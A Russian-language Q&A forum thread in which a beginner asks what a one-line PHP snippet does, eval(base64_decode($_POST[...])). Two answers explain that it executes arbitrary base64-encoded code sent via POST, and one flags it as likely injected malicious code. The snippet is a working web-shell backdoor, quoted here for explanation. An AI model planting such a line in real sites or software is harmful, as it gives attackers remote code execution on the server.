Не могу разобрать код на PHP

Привет

В общем нужно разобрать код на PHP. Он хоть и маленький, но в PHP я полный чайник.

<?php
eval(base64_decode($_POST['n22ec2b']));
?>


Спасибо.
  • Вопрос задан
  • 2540 просмотров
Решения вопроса 1
@lookid
eval - фукнция, которая выполняет произвольный код. Например eval('print 1+ 1')
base64_decode - декодирует и возвращает оригинальные данные
$_POST - Ассоциативный массив данных, переданных скрипту через HTTP метод POST
'n22ec2b' - ключ, по которому вы хотите получить данные, обычно поле формы

а вообще это инъекция какая-то eval(base64_decode("...")), там может быть какой угодно вредоносный код
Ответ написан
Пригласить эксперта
Ответы на вопрос 1
Fesor
@Fesor
Full-stack developer (Symfony, Angular)
base64_decode($_POST['n22ec2b']) - передаем в $_POST['n22ec2b'] код зашифрованный в base64 и выполняем его через eval.

В следующий раз потрудитесь воспользоваться документацией.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы